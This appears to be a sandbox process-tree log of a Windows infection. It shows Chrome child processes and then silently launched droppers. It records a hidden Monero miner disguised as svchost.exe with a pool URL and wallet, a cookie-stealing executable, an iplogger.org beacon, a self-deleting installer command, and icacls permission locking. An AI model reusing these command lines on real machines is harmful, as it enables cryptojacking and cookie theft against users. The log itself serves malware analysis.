C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:212⤵PID:7076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:112⤵PID:7140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:112⤵PID:5932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:112⤵PID:5684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:112⤵PID:2696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:112⤵PID:2188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:112⤵PID:6732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:812⤵PID:6008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4068 /prefetch:812⤵PID:6236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:812⤵PID:4504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:812⤵PID:6708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:812⤵PID:4528
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings12⤵PID:7584
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff707fa7740,0x7ff707fa7750,0x7ff707fa776013⤵PID:7612
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4088 /prefetch:812⤵PID:7596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3092 /prefetch:812⤵PID:7696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3880 /prefetch:812⤵PID:7752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 /prefetch:812⤵PID:7820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:812⤵PID:7844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4384 /prefetch:812⤵PID:7960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:812⤵PID:8012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1732 /prefetch:812⤵PID:8072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 /prefetch:812⤵PID:8112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4920 /prefetch:812⤵PID:8180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4164 /prefetch:812⤵PID:5908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:812⤵PID:2052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3148 /prefetch:812⤵PID:5376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:812⤵PID:4520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3840 /prefetch:812⤵PID:6916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3392 /prefetch:812⤵PID:156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:812⤵PID:5744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 /prefetch:812⤵PID:3320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:812⤵PID:4856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:812⤵PID:4308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:812⤵PID:7648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4292 /prefetch:812⤵PID:7908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:812⤵PID:8060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:112⤵PID:8044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:812⤵PID:7792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:812⤵PID:8100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4936 /prefetch:812⤵PID:7904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1932 /prefetch:812⤵PID:1760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:812⤵PID:8048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3328 /prefetch:812⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5088 /prefetch:812⤵PID:8152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5468 /prefetch:812⤵PID:7532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:112⤵PID:6884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:812⤵PID:4224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5860 /prefetch:812⤵PID:6756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:812⤵PID:4048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6124 /prefetch:812⤵PID:6980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5424 /prefetch:812⤵PID:7284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:112⤵PID:7264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:812⤵PID:4520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:812⤵PID:684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5728 /prefetch:812⤵PID:6940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5104 /prefetch:212⤵PID:6548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:812⤵PID:4704
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg8⤵
- Runs .reg file with regedit
PID:4820
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\DataFinder.exe"C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\DataFinder.exe" /Verysilent4⤵PID:5228
-
C:\Users\Admin\Services.exe"C:\Users\Admin\Services.exe"5⤵PID:6992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth6⤵PID:3668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\Delta.exe" /Verysilent4⤵PID:7808
-
C:\Users\Admin\AppData\Local\Temp\is-TN2OH.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-TN2OH.tmp\Delta.tmp" /SL5="$50476,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\Delta.exe" /Verysilent5⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\is-3BEAB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3BEAB.tmp\Setup.exe" /VERYSILENT6⤵PID:8128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-3BEAB.tmp\Setup.exe & exit7⤵PID:6516
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f8⤵
- Kills process with taskkill
PID:7336
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\zznote.exe" /Verysilent4⤵PID:8060
-
C:\Users\Admin\AppData\Local\Temp\is-PLR21.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-PLR21.tmp\zznote.tmp" /SL5="$702E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\zznote.exe" /Verysilent5⤵PID:4860
-
C:\Users\Admin\AppData\Local\Temp\is-S5HJ0.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-S5HJ0.tmp\jg4_4jaa.exe" /silent6⤵PID:5900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\hjjgaa.exe" /Verysilent4⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:1192
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:768
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-5QGS8.tmp\setup_10.2_us3.tmp"C:\Users\Admin\AppData\Local\Temp\is-5QGS8.tmp\setup_10.2_us3.tmp" /SL5="$B01CE,746887,121344,C:\Users\Admin\AppData\Local\Temp\0okedxxjmwn\setup_10.2_us3.exe" /silent1⤵PID:4184
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s12⤵PID:4648
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"3⤵PID:5536
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1Gusg7"2⤵PID:4896
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:5140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5832
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:808
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4888
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5528
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6228
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2980
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\fef041547bd64dd29eeb7fa850a7283f /t 0 /p 55281⤵PID:1156
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4236
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3880
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1008
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7420
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:7944
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6356
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{14d0b1ce-2622-1b4a-aafe-476cd51e972f}\oemvista.inf" "9" "4d14a44ff" "0000000000000124" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:1772
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000124"2⤵PID:7788
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7972
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7924
-
C:\Users\Admin\AppData\Local\Temp\8F18.exeC:\Users\Admin\AppData\Local\Temp\8F18.exe1⤵PID:5756
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\1a256071-054d-4356-b1ff-16b9a76678ba" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\8F18.exe"C:\Users\Admin\AppData\Local\Temp\8F18.exe" --Admin IsNotAutoStart IsNotTask2⤵PID:6708
-
